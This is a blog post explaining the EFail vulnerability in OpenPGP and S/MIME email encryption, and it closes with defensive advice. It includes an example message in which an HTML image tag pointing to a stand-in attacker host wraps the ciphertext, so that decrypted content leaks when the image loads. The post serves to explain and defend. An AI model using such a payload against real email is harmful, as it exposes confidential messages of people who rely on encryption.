“Email is a plaintext communication medium whose communication paths are partly protected by TLS. For people in hostile environments (journalists, political activists, whistleblowers, …) who depend on the confidentiality of digital communication, this may not be enough.”
This is according to a researcher on the EFail website, who goes on to describe how this vulnerability exploits OpenPGP and S/MIME. Unless you are familiar with this type of encryption, it would be easy to assume that PGP is no longer safe. Some have gone a step further and even recommended not using PGP. This is not necessarily good advice as PGP is still secure. For some, TLS encryption is not enough to safeguard their emails. You would have to distrust the email server you are using or the certificates on the server. Nation-state actors are one of the few groups – perhaps the only group – that would possibly be able to view an email when the server uses TLS unless the server/client you are sending the email to is compromised. (Note: TLS is not compromised by EFail in any way)
OpenPGP and S/MIME are vulnerable to EFail and I am not trying to downplay this. Adding a hyperlink in the email parts that are not encrypted causes the encrypted part to be linked to a website. The email data would look like this.
Unencrypted content for routing email -Encryption boundary- Content-Type: text/html <img src=https:// NationstateActor.com/ -Encryption boundary- Content-Type: application/pkcs7-mime; s-mime-typed-envelope-data Content-Transfer-Encoding: base64 75c753802038f7e7eb2f659217ebfd8e43c698cdd5e8e3d49aaa5fa3683f9000… -Encryption boundary- Content-Type: text/html "> -Encryption boundary-
This creates an image that when loaded in the email client makes a request to https:// NationstateActor.com/SecretMessage.
If you have allowed external content in the email client this would be a concern. The email may be vulnerable If it matches these 4 criteria: .
- Email doesn’t use or you don’t trust the TLS email server
- Uses PGP or S/MIME for encryption
- Uses a client that is vulnerable
- Enables HTML and allows external content to be loaded from the email
There is a vulnerability here that should be addressed and resolved by an update, but PGP is still secure and can be used to protect emails. If you do use PGP or S/MIME, we recommend you use an external application for decryption, update your client when possible, and be cautious of emails you receive that have external content. –Trevor Collins
Leave a Reply